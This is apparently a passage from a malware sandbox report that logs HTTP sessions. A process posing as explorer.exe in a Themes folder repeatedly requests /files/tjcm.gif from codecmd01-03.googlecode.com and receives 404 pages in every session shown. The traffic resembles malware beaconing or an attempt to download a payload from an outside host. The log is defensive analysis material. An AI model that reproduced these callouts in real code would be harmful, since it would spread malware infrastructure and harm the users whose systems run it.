{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:34.098293066 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49731	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:35.342643976 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:36.048266888 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:35 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:36.048305988 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49732	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:37.291599989 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:38.001218081 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:37 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:38.001245975 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49733	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:39.205668926 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:40.359330893 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:39 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:40.359559059 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Sep 2, 2024 14:24:40.359594107 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Sep 2, 2024 14:24:40.359621048 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:39 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:40.364537954 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49734	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:41.401356936 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:42.098434925 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:42 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:42.098453999 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49735	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:43.153199911 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:43.876002073 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:43 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:43.876029968 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49736	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:44.869262934 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:45.592941046 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:45 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:45.592957973 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49737	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
